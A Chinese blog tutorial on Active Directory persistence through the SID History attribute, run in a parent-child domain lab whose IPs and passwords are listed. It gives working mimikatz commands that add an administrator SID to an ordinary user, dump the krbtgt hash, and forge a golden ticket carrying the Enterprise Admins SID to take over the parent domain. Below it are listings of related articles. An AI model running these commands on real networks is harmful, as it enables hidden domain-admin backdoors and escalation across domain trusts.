域渗透 - 权限维持 SID History

最新推荐文章于 2024-03-22 18:23:09 发布
最新推荐文章于 2024-03-22 18:23:09 发布
阅读量395 收藏 1
点赞数
分类专栏: 内网蠕动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/119352205
版权

域渗透 - 权限维持 SID History

环境搭建

这里需要父子域
可以参考
https://blog.csdn.net/qq_43645782/article/details/119330508

机器名ip用户密码dns
fad.test.com192.168.164.146administratorAa1234192.168.164.146
cad.ch.test.com192.168.164.156administratorAa1234.192.168.164.146
user.ch.test.com192.168.164.157user1Uu1234.192.168.164.156

SID History属性介绍

每个用户帐号都有一个关联的安全标识符(简称SID),SID用于跟踪安全主体在访问资源时的帐户与访问权限。为了支持AD牵移,微软设计了SID History属性,SID History允许另一个帐户的访问被有效的克隆到另一个帐户。

利用条件

1.当前域与其他域有信任关系,例如当前域与domain1.com和domian2.com存在双向信任

nltest /domain_trusts /all_trusts /v /server:192.168.164.156

在这里插入图片描述
2.开启sid-history
需要管理员权限

netdom trust /d:test ch.test.com /enablesidhistory:yes

在这里插入图片描述

利用

同一个域内

SID History可以在同一个域中工作,即DomainA 中的常规用户帐户可以包含 DomainA SID,假如这个DomainA SID是一个特权帐户或组,那就可以在不作为域管 理员成员的情况下授予常规用户域管理员权限,相当于一个后门。
已经拥有一个域账户的密码或者hash
将管理员的sid赋给用户user1
在这里插入图片描述

mimikatz "privilege::debug" "sid::patch" "sid::add /sam:user1 /new:S-1-5-21-1072576212-2014124830-3793978428-500" "exit"

在这里插入图片描述
在这里插入图片描述

同一域树下的提权利用方式

对于同一个域树中的父子域来说,如果获得子域中的高权限用户,就可以修改将该用户的SID赋予企业管理员权限,这样对于父域来说该用户也是高权限用户。假设我们已经拿下子域sub.domain.com的域控权限,即可以利用该方法在父域提权。需要知道

子域的krbtgt hash和域sid
父域的sid

sid可以通过

nltest /domain_trusts /all_trusts /v /server:192.168.164.146

在这里插入图片描述
krbtgt

mimikatz "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "exit"

e58e000e8f48d47f992d304339254904#krbtgt
S-1-5-21-1072576212-2014124830-3793978428#子域sid
S-1-5-21-1476105802-4187504772-1115168634#父域sid

在这里插入图片描述

mimikatz "kerberos::golden /user:Administrator /krbtgt:e58e000e8f48d47f992d304339254904 /domain:ch.test.com /sid:S-1-5-21-1072576212-2014124830-3793978428 /sids:S-1-5-21-1476105802-4187504772-1115168634-519 /ptt" "exit"

在这里插入图片描述

参考文章

tangyu/域渗透 - 权限维持之 SID History

whojoe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton Key DCShadow BadGPO(Group Policy Objects) ACL (Access Control Lists) ACL -AdminSDHolder ACL -DCSync
linux sid提权(保姆级教程)
菜鸟学安全的博客
05-30 379
linux提权只 sid提权保姆级教程。细致讲解。
SID History后门及检测思路分析
最新发布
#7的博客
03-22 837
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的用户中注入到内存进行Dcsync或进行远程登录等,需要注意的是该操作并不会在控的LDAP属性中添加,只会在攻击机的票据PAC中添加到高权限SID History。privilege::debug sid::patch sid::add /sam:whoami/new:Administrator (将Administrator的SID添加到whoami的SID History属性中)
权限维持】-SIDHistory
qq_41617902的博客
01-20 153
SID History的作用是在迁移过程中保持用户的访问权限
权限维持SID History后门
01-29 321
01、简介 每个用户都有一个关联的安全标识符(SID),SID History的作用是在迁移过程中保持用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。 02、利用方式 (1)使用管理员权限查看test用户的SID History属性 PS C:\Users\Ad...
利用SID History建立隐蔽后门
yy
03-02 234
SID History是一个支持迁移方案的属性,使得一个账户的访问权限可以有效的克隆到另外一个账户,这在迁移过程中非常有效。例如,当Domain A中的用户迁移到Domain B时,会在Domain B中创建一个新的用户账户,并将Domain A用户的SID添加到Domain B的用户账户的SID History属性中。在实战中,红队人员可以将管理员用户的SID添加到其他用户的SID History属性中,以此建立一个隐蔽的后门。通过powershell查看yuwin7用户的属性。
渗透权限维持SID History
weixin_42282189的博客
09-06 359
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 SID的主要作用是跟踪安全主体控制用户连接资源时的访问权限SID History 是在迁移过程中需要使用的一个属性,SID History 主要作用是在迁移过程中保持用户的访问权限,如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。 因此使用mimikatz可以将SID His.
SID History权限维持
weixin_41082546的博客
05-05 581
一、简介   每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在迁移过程中需要使用的一个属性。   如果A中的用户迁移到B中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在迁移过程中保持用户的访问权限,如果迁移后用户的SID值改变,系统会将原...
权限维持之:SID History 权限维持
f_carey的博客
12-18 842
权限维持之:SID History 权限维持1 SID 作用2 利用 SID History 操作过程3 SID History 权限维持的防御 1 SID 作用 ​ 每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在迁移过程中需要使用的一个属性。 ​ 如果A中的用户迁移到B中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在迁移过程中保持用户的访问权限
domain SID History attributes
include_heqile的博客
10-29 432
原文链接 domain SID History attributes主要用来支持的迁移 每一个用户都有一个SID用于标识安全主体以及该用户对特定资源的访问权限SID History使得被克隆的用户可以访问之前用户能够访问的资源。这样就可以保证当一个用户迁移到另一个中之后仍然可以访问以前所在中的资源。 因为用户迁移到新的之后,他的SID就会发生改变,所以需要将其原来的OLD SID映射...
SIDHistory属性的利用
热门推荐
Shanfenglan's blog
12-24 4万+
文章目录1. 前言2.对某用户的SIDHistory属性进行操作2.1 查询zhangsan的SIDHistory2.2 给zhangsan用户添加管的sid2.3 删除zhangsan的SIDHistory属性3.利用思路3.1 权限维持3.2 利用当前用户的sidhistory属性防御方法 1. 前言 SIDHistory属性的存在是为了解决用户在迁移到另一个中的时候权限会改变的问题。例如用户zhangsan在A中本来是管理员,迁移到B的时候因为sid的改变有可能会变成普通用户权限,这时候如果给
gmm的matlab代码-project-SID-GMM-UBM:项目SID-GMM-UBM
05-26
gmm的matlab代码项目SID-GMM-UBM project-SID-GMM-UBM#此软件包包含Matlab代码和Python代码## 1。如果不使用我们的数据集,请使用三个pyfile预处理数据集。 ## 2。VocalSeparation软件包用于人声提取## 3.Datasets...
SID-重新生成
04-11
可以指定一个SID,也可以生成一个随机的SID,如果你对SID的格式不熟悉,建议还是使用随机SID。 以上就是win7系统SID安全标识符怎么修改的全部内容,需要自己设置设置SID安全标识符的话,可以按照上述的教程来操作。...
sid-paper:sid的技术论文
02-10
19 }, author={Gabler, Janos and Raabe, Tobias and R{\"o}hrl, Klara}, year={2020}, publisher={IZA Discussion Paper}}相关刊物这是依赖sid的出版物的列表。 Dorn,F.,Gabler,J.,von Gaudecker,HM,Peichl,...
pheonix-by-sid
03-20
pheonix-by-sid
msf下MS17-010模块使用总结
whojoe的博客
06-20 1万+
msf下MS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章 前言 在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。 环境搭建 这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机 kali 192.168.164.155 靶机1 192.168.164.156 靶机2 192.168.164.161(丢一个360的安装包进去,等会要用) 靶机2还要开启命名管道的匿名访问 打开cmd 执行g
cve-2021-21985漏洞复现
whojoe的博客
06-09 6430
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
读取mstsc历史密码
whojoe的博客
02-19 4718
读取mstsc历史密码通过注册表查看历史记录通过本地Credentials读取记录使用mimikatz读取密码(需要保存过凭证的才可以) 通过注册表查看历史记录 reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s 通过本地Credentials 读取记录 dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 使用mimikat
mssql堆叠注入利用总结
whojoe的博客
06-22 3114
mssql堆叠注入利用总结前言环境写webshellxp_dirtreexp_dirtree杀软反应xp_cmdshellxp_cmdshell杀软反应通过命令执行拿shell无杀软有杀软通过差异备份写shell有杀软log备份有杀软遇到的问题sp_oacreate无杀软有杀软参考文章 前言 前一段时间遇到了两个mssql的注入,一个是可以限制长度的命令执行,另一个是网站可以注入,但是主机存在杀软,不可以使用xp_cmdshell,所以总结一下mssql堆叠注入环境下的函数利用,以及杀软的反应 当然,下面的
sid-为前缀生成32位uuid
03-02
以下是使用Python代码生成以"sid-"为前缀的32位UUID的示例: ```python import uuid prefix = "sid-" uuid_str = str(uuid.uuid4()) # 将UUID前缀和生成的UUID字符串拼接起来 result = prefix + uuid_str print...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值